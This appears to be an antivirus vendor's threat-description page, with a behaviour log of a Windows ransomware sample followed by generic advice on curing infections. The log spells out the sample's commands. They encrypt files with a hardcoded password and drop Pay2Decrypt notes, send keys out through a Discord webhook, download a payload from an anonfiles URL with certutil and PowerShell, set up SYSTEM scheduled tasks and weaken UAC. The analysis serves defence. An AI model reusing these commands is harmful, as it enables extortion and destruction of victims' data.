  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.lck.lck" "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec...
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.lck.lck" "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec...
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "FXSAPIDebugLogFile.txt.lck" "FXSAPIDebugLogFile.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "opera_crashreporter.log.lck" "opera_crashreporter.log"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "ntuser.dat.LOG1.lck" "ntuser.dat.LOG1"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt73.txt.lck" "Pay2Decrypt73.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "~DF126C65421E97E1B5.TMP.lck" "~DF126C65421E97E1B5.TMP"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "CVRDE7F.tmp.cvr.lck" "CVRDE7F.tmp.cvr"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "CVRC867.tmp.cvr.lck" "CVRC867.tmp.cvr"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "CVRBADA.tmp.cvr.lck" "CVRBADA.tmp.cvr"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "CProgram.lck" "CProgram"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "CVR6B9C.tmp.cvr.lck" "CVR6B9C.tmp.cvr"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "CVR6D44.tmp.cvr.lck" "CVR6D44.tmp.cvr"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "jawshtml.html.lck" "jawshtml.html"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "kill.bat.lck" "kill.bat"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.lck" "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM...
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "CVREAF2.tmp.cvr.lck" "CVREAF2.tmp.cvr"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "jusched.log.lck" "jusched.log"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt72.txt.lck" "Pay2Decrypt72.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt63.txt.lck" "Pay2Decrypt63.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt11.txt.lck" "Pay2Decrypt11.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt12.txt.lck" "Pay2Decrypt12.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt13.txt.lck" "Pay2Decrypt13.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt14.txt.lck" "Pay2Decrypt14.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt15.txt.lck" "Pay2Decrypt15.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt16.txt.lck" "Pay2Decrypt16.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt17.txt.lck" "Pay2Decrypt17.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt18.txt.lck" "Pay2Decrypt18.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt71.txt.lck" "Pay2Decrypt71.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt19.txt.lck" "Pay2Decrypt19.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt20.txt.lck" "Pay2Decrypt20.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt21.txt.lck" "Pay2Decrypt21.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt22.txt.lck" "Pay2Decrypt22.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt23.txt.lck" "Pay2Decrypt23.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt24.txt.lck" "Pay2Decrypt24.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt25.txt.lck" "Pay2Decrypt25.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt26.txt.lck" "Pay2Decrypt26.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt27.txt.lck" "Pay2Decrypt27.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt10.txt.lck" "Pay2Decrypt10.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt100.txt.lck" "Pay2Decrypt100.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt28.txt.lck" "Pay2Decrypt28.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt1.txt.lck" "Pay2Decrypt1.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt86.txt.lck" "Pay2Decrypt86.txt"
  • '%TEMP%\e35c.tmp\discordsendwebhook.exe' -m ":satellite: LEAKGAP: Info from user, Password: 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH, FakeAccount: LFVzAz7wZoIB607lrOse58PtIv4FK0bba, PersonalKey:||glFYFErVRmreS740iLR44vNkWFJv3xaOPtPNhx8SxAN5N|...
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' start-process -verb runas -FilePath "%TEMP%\final.exe" -WindowStyle hidden
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "desktop.ini.lck" "desktop.ini"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt98.txt.lck" "Pay2Decrypt98.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt97.txt.lck" "Pay2Decrypt97.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt96.txt.lck" "Pay2Decrypt96.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt95.txt.lck" "Pay2Decrypt95.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt99.txt.lck" "Pay2Decrypt99.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt51.txt.lck" "Pay2Decrypt51.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt2.txt.lck" "Pay2Decrypt2.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt94.txt.lck" "Pay2Decrypt94.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt92.txt.lck" "Pay2Decrypt92.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt91.txt.lck" "Pay2Decrypt91.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt90.txt.lck" "Pay2Decrypt90.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt9.txt.lck" "Pay2Decrypt9.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt89.txt.lck" "Pay2Decrypt89.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt88.txt.lck" "Pay2Decrypt88.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt87.txt.lck" "Pay2Decrypt87.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt85.txt.lck" "Pay2Decrypt85.txt"
  • '%TEMP%\e35c.tmp\e35d.tmp\extd.exe' "/download" "https://cdn-35.anonfiles.com/9821W1G5p3/8a0b1f8a-1613613819/gameover.exe" "%TEMP%\final.exe" "" "" "" "" "" ""
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt93.txt.lck" "Pay2Decrypt93.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "final.exe.lck" "final.exe"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt70.txt.lck" "Pay2Decrypt70.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt53.txt.lck" "Pay2Decrypt53.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt55.txt.lck" "Pay2Decrypt55.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt56.txt.lck" "Pay2Decrypt56.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt57.txt.lck" "Pay2Decrypt57.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt58.txt.lck" "Pay2Decrypt58.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt59.txt.lck" "Pay2Decrypt59.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt6.txt.lck" "Pay2Decrypt6.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt60.txt.lck" "Pay2Decrypt60.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt61.txt.lck" "Pay2Decrypt61.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt30.txt.lck" "Pay2Decrypt30.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt62.txt.lck" "Pay2Decrypt62.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt64.txt.lck" "Pay2Decrypt64.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt65.txt.lck" "Pay2Decrypt65.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt66.txt.lck" "Pay2Decrypt66.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt67.txt.lck" "Pay2Decrypt67.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt68.txt.lck" "Pay2Decrypt68.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt69.txt.lck" "Pay2Decrypt69.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt7.txt.lck" "Pay2Decrypt7.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt52.txt.lck" "Pay2Decrypt52.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt3.txt.lck" "Pay2Decrypt3.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt54.txt.lck" "Pay2Decrypt54.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt84.txt.lck" "Pay2Decrypt84.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt5.txt.lck" "Pay2Decrypt5.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt31.txt.lck" "Pay2Decrypt31.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt33.txt.lck" "Pay2Decrypt33.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt34.txt.lck" "Pay2Decrypt34.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt35.txt.lck" "Pay2Decrypt35.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt36.txt.lck" "Pay2Decrypt36.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt37.txt.lck" "Pay2Decrypt37.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt38.txt.lck" "Pay2Decrypt38.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt39.txt.lck" "Pay2Decrypt39.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt50.txt.lck" "Pay2Decrypt50.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt4.txt.lck" "Pay2Decrypt4.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt29.txt.lck" "Pay2Decrypt29.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt41.txt.lck" "Pay2Decrypt41.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt43.txt.lck" "Pay2Decrypt43.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt44.txt.lck" "Pay2Decrypt44.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt45.txt.lck" "Pay2Decrypt45.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt46.txt.lck" "Pay2Decrypt46.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt47.txt.lck" "Pay2Decrypt47.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt48.txt.lck" "Pay2Decrypt48.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt49.txt.lck" "Pay2Decrypt49.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt40.txt.lck" "Pay2Decrypt40.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt32.txt.lck" "Pay2Decrypt32.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt42.txt.lck" "Pay2Decrypt42.txt"
  • '<SYSTEM32>\cmd.exe' /k call %TEMP%\p2d.bat' (with hidden window)
Executes the following
  • '<SYSTEM32>\cmd.exe' /c "%TEMP%\E35C.tmp\E35D.tmp\E35E.bat <Full path to file>"
  • '<SYSTEM32>\cmd.exe' /c dir * /aD /b /oS
  • '<SYSTEM32>\cmd.exe' /c dir * /a-D /b /oS
  • '<SYSTEM32>\attrib.exe' +r +s +h %LOCALAPPDATA%\Temp /s /D
  • '<SYSTEM32>\schtasks.exe' /create /sc DAILY /tn UpdateWuaucltHelper /rl highest /tr "%TEMP%\final.exe" /RU "SYSTEM" /MO 5
  • '<SYSTEM32>\certutil.exe' -urlcache -split -f https://cdn-35.anonfiles.com/9821W1G5p3/8a0b1f8a-1613613819/gameover.exe %TEMP%\final.exe
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -c Invoke-WebRequest -Uri https://cdn-35.anonfiles.com/9821W1G5p3/8a0b1f8a-1613613819/gameover.exe -OutFile %TEMP%\final.exe
  • '<SYSTEM32>\notepad.exe' %HOMEPATH%\Desktop\Pay2Decrypt1.txt
  • '<SYSTEM32>\cmd.exe' /k call %TEMP%\p2d.bat
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' start-process -FilePath "<SYSTEM32>\cmd.exe" -ArgumentList "/k","call","%TEMP%\p2d.bat" -WorkingDirectory "%HOMEPATH%\Desktop" -WindowStyle hidden
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -c Invoke-WebRequest -Uri -OutFile
  • '<SYSTEM32>\schtasks.exe' /create /sc onlogon /tn UpdateWuauclt /rl highest /tr "<Full path to file>" /RU "SYSTEM" /f
  • '<SYSTEM32>\attrib.exe' +r +s +h "%TEMP%\E35C.tmp\DiscordSendWebhook.exe"
  • '<SYSTEM32>\attrib.exe' +r +s +h "%TEMP%\E35C.tmp\aescrypt.exe"
  • '<SYSTEM32>\attrib.exe' +r +s +h <Full path to file>
  • '<SYSTEM32>\reg.exe' ADD "HKCU\Control Panel\Mouse" /v SwapMouseButtons /t REG_SZ /d "1" /f
  • '<SYSTEM32>\reg.exe' ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
  • '<SYSTEM32>\reg.exe' ADD "HKLM\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f00000001000...
  • '<SYSTEM32>\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "1" /f
  • '<SYSTEM32>\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t REG_DWORD /d "0" /f
  • '<SYSTEM32>\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t REG_DWORD /d "0" /f
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' start -verb runas cmd.exe -ArgumentList "/c kill.bat" -filepath "%LOCALAPPDATA%\Temp" -WindowStyle hidden
  • '<SYSTEM32>\certutil.exe' -urlcache -split -f

Curing recommendations

  1. If the operating system (OS) can be loaded (either normally or in safe mode), download Dr.Web Security Space and run a full scan of your computer and removable media you use. More about Dr.Web Security Space.
  2. If you cannot boot the OS, change the BIOS settings to boot your system from a CD or USB drive. Download the image of the emergency system repair disk Dr.Web® LiveDisk, write it to a USB drive or burn it to a CD/DVD. After booting up with this media, run a full scan and cure all the detected threats.
Use Dr.Web Anti-virus for macOS to run a full scan of your Mac.

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

  1. If the mobile device is operating normally, download and install Dr.Web for Android. Run a full system scan and follow the recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount, or you see some other announcement that prevents you from using the handheld normally), do the following:
    • Boot your smartphone or tablet in safe mode (depending on the operating system version and the specifications of the particular mobile device, this procedure can be performed in various ways; consult the user guide that was shipped with the device, or contact its manufacturer);
    • Once safe mode is active, install Dr.Web for Android onto the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.
